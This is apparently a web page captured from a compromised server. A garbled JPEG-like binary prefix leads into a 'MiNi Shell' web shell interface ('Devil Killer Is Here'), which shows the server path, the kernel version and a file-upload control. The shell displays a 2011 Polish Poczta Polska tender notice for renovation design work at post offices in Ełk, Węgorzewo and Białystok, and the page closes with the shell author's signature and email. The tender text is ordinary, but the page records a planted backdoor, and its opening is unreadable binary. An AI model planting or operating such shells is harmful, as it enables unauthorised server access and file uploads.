JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110509/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110509/104938-N-2011.html

<p class="kh_header"><b>Białystok: Opracowanie dokumentacji projektowo-kosztorysowej</b><br>
<b>Numer ogłoszenia: 104938 - 2011; data zamieszczenia: 09.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Poczta Polska S.A. z siedzibą w Warszawie przy ul. Rakowieckiej 26, 00-940 Warszawa, jednostka Zamawiającego prowadząca postępowanie: Poczta Polska S.A. Centrum Infrastruktury Oddz. Regionalny w Białymstoku , ul. Kolejowa 26, 15-959 Białystok, woj. podlaskie, tel. 85 6623496, faks 85 6623544.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> poczta-polska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo-kosztorysowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie dokumentacji projektowo-kosztorysowej na Zadanie 1: remont budynków Urzędu Pocztowego Ełk 1 przy ul. Chopina 1
Zadanie 2: remont budunku Urzędu Pocztowego Węgorzewo przy ul. Zamkowej 9
Zadanie 3: remont poddasza budunku Urzędu Pocztowego Białystok 1 przy ul. Warszawskiej 10. 
Dokumentację projektowo - kosztorysową należy opracować z uwzględnieniem Danych wyjściowych do projektowania. W przypadku konieczności uzyskania niezbędnych do opracowania dokumentacji projektowo - kosztorysowej materiałów, tj. mapy do celów projektowych, warunków,opracowań, pozwoleń, operatów, uzgodnień, opinii, zatwierdzeń, dodatkowych aktualizacji koniecznych do realizacji przedmiotu zamówienia, Wykonawca zobowiązany jest je opracować i pozyskać na własny koszt. Po opracowaniu i przekazaniu dokumentacji projektowo-kosztorysowej na remont budynków UP Ełk 1, UP Węgorzewo i UP Białystok 1, Wykonawca przeniesie na rzecz Zamawiającego własności praw autorskich, praw majątkowych do całości tej dokumentacji i do każdej jej części składowej ze szczególnym uwzględnieniem prawa Zamawiającego do dowolnego adaptowania lub wykorzystania całości dokumentacji lub dowolnej części w innych realizacjach w jednostkach organizacyjnych  POCZTA POLSKA..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez wykonawcę warunków, o których mowa powyżej, wykonawca ma obowiązek przedstawić w ofercie oświadczenie zgodnie z załącznikiem nr 2 do SIWZ.Na podstawie złożonych dokumentów Zamawiający dokona oceny spełniania warunków udziału metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku posiadania wiedzy i doświadczenia za spełniony jeżeli Wykonawca wykaże, że wykonał co najmniej 3 dokumentacje projektowo- kosztorysowe o wartości: Zadanie nr 1: co najmniej 63.000 zł brutto każda, Zadanie nr 2: co najmniej 33.000 zł brutto każda, Zadanie nr 3: co najmniej 42.000 zł brutto każda</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek, że  osoby które będą uczestniczyć w wykonaniu zamówienia  posiadają wymagane uprawnienia budowlane do projektowania i należą do Polskiej Izby Inżynierów lub Izby Architektów Rzeczpospolitej Polskiej w specjalności konstrukcyjno-budowlanej, sanitarnej, elektrycznej i architektonicznej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek, że  osoby które będą uczestniczyć w wykonaniu zamówienia  posiadają wymagane uprawnienia budowlane do projektowania i należą do Polskiej Izby Inżynierów lub Izby Architektów Rzeczpospolitej Polskiej w specjalności konstrukcyjno-budowlanej, sanitarnej, elektrycznej i architektonicznej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez wykonawcę warunków, o których mowa powyżej, wykonawca ma obowiązek przedstawić w ofercie oświadczenie zgodnie z załącznikiem nr 2 do SIWZ.Na podstawie złożonych dokumentów Zamawiający dokona oceny spełniania warunków udziału metodą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.poczta-polska.pl/O_Firmie/?d=przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poczta Polska S.A. Centrum Infrastruktury Oddział Regionalny w Białymstoku,ul. Kolejowa 26, 15-959 Białystok, Dział Zamówień Publicznych, pok. 208, tel. 85-662-35-56.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.05.2011 godzina 10:00, miejsce: Poczta Polska S.A. Centrum Infrastruktury Oddział Regionalny w Białymstoku,ul. Kolejowa 26 15-959 Białystok pok.105 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie  dokumentacji projektowo-kosztorysowej na remont budynków Urzędu Pocztowego Ełk 1  przy ul. Chopina 1, 19-300 Ełk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dane wyjściowe do projektowania remontu Urzędu Pocztowego Ełk 1-kubatura 9326,89 m3, pow. Użytkowa 1819,21 m2.1.Zakres projektu remontu branży budowlanej:Projekt rozbiórki budynku gospodarczego naprzeciw ekspedycji wraz z uzupełnieniem powierzchni placu, ogrodzeniem i odwodnieniem oraz uzupełnieniem oświetlenia placu;Remont izolacji pionowej ścian fundamentowych; Projekt remontu garażu na potrzeby wartowni ( 2 osoby stałego przebywania oraz szatnie dla 12 osób) wraz z niezbędnym zapleczem i instalacjami; Zagospodarowanie pomieszczeń ekspedycji z uwzględnieniem pokoi po wartownikach wraz z niezbędnymi instalacjami. 2.Zakres projektu remontu branży sanitarnej: Remont wentylacji wszystkich pomieszczeń; Remont wodnych kurtyn powietrznych na ekspedycji, przy stanowisku masowego nadawcy i przy wejściu głównym do urzędu z przystosowaniem węzła cieplnego.3.Zakres projektu remontu branży elektrycznej:Remont instalacji komputerowej, dedykowanej i logistycznej;Wymiana UPS i dostosowanie mocy do wymaganych potrzeb oraz zmiana lokalizacji pomieszczenia serwerowni i UPS do pomieszczeń piwnicznych;Remont instalacji przeciwoblodzeniowej na dachach i w rurach spustowych wraz ze sterowaniem automatycznym;Przeliczenie i zbilansowanie mocy tablicy głównej. Pozostałe wymagania stawiane przez Zamawiającego zawarte są w opisie przedmiotu zamówienia. TERMIN WYKONANIA ZAMÓWIENIA: na remont wentylacji i instalacji przeciwoblodzeniowej - do 30.09.2011 r.;  na pozostały zakres - do 15.12.2011 r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie  dokumentacji projektowo-kosztorysowej na remont budynku Urzędu Pocztowego Węgorzewo ul. Zamkowa 9 w Węgorzewie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dane wyjściowe do projektowania remontu fragmentu I piętra części podpiwniczonej budynku głównego oraz ekspedycji na parterze: kubatura  681,40 m3, pow. Użytkowa 200,40 m2.1.Wykonanie ekspertyzy technicznej stwierdzającej przyczyny spękań ścian i stopów oraz schodów na klatce schodowej w części niepodpiwniczonej budynku wraz ze sposobem ich naprawy.2.Remont fragmentu I piętra części podpiwniczonej budynku z zaprojektowaniem pomieszczeń na sale służby doręczeń dla 20 listonoszy wraz z pomieszczeniami sanitarno-higienicznymi. 3.Remont instalacji elektrycznej z wymianą osprzętu oraz tablic rozdzielczych.4.Remont instalacji sanitarnej i wentylacji.5.Remont instalacji komputerowej z doprowadzeniem sieci do pomieszczeń służby doręczeń.6.Zakres remontu branży budowlanej: Remont posadzek;Wymiana stolarki drzwiowej w części remontowej i stolarki okiennej na całym I piętrze; Remont tynków ścian i powłok malarskich;Zamurowanie przejścia na I piętrze pomiędzy pomieszczeniem części niepodpiwniczonej i podpiwniczonej budynku;Remont klatki schodowej przy ekspedycji wraz z podniesieniem wysokości poręczy; Na parterze części podpiwniczonej budynku połączenie pomieszczeń po listonoszach z pomieszczeniem ekspedycji wraz z zaprojektowaniem nie mniej niż 22 przegródek na korespondencję dla listonoszy, remontem instalacji elektrycznej i komputerowej; Po wyremontowaniu pomieszczeń na I piętrze kontrolę dostępu należy wyprowadzić na zewnętrzne drzwi wejściowe do budynku. Pozostałe wymagania stawiane przez Zamawiającego zawarte są w opisie przedmiotu zamówienia. Termin wykonania zamówienia: ekspertyza techniczna - 1 miesiąc od daty podpisania umowy;na pozostały zakres: - do 15.09.2011 r.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie  dokumentacji projektowo-kosztorysowej na remont  poddasza budynku Urzędu Pocztowego Białystok 1 ul. Warszawska 10 w Białymstoku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dane wyjściowe do projektowania remontu poddasza remontu poddasza w budynku Urzędu Pocztowego Białystok 1 kubatura 468,15 m3, pow. użytkowa 156,05 m2. 1.Wykonanie ekspertyzy technicznej wytrzymałości stropu poddasza. 2.Zakres projektu remontu branży sanitarnej: Remont wentylacji poddasza;Remont klimatyzatorów w pomieszczeniach świetlicy; Przeprojektowanie z dostosowaniem do zapotrzebowania mocy instalacji  c.o. na poddaszu;3.Zakres projektu remontu branży elektrycznej: Remont instalacji elektrycznej i logistycznej;Wymiana WLZ do zasilania świetlicy oraz zbilansowanie mocy elektrycznej; Remont instalacji ppoż.; 4.Zakres projektu remontu branży budowlanej: Powiększenie pomieszczenia świetlicy na poddaszu poprzez podwyższenie i rozszerzenie o przyległe nieużytkowe pomieszczenie strychowe; Wymiana pokrycia dachu z zapewnieniem w pomieszczeniu świetlicy wymaganego doświetlenia dziennego poprzez wstawienie okien dachowych z żaluzjami i siłownikami sterowanymi elektrycznie; Remont pomieszczeń na poddaszu poprzez wymianę starych drewnianych ścianek działowych nas nowe gipsowo kartonowe, ognioochronne na stelażu metalowym, obłożenie ścian i skosów płytami GK Ogień, remont ocieplenia poddasza z wełny mineralnej, remont posadzek cementowych, wykładzin PCV i parkietu. Remonty tynkarskie i malarskie.Pozostałe wymagania stawiane przez Zamawiającego zawarte są w opisie przedmiotu zamówienia. Termin wykonania zamówienia: ekspertyza techniczna - 1 miesiąc od daty podpisania umowy; na pozostały zakres:do 15.12.2011 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com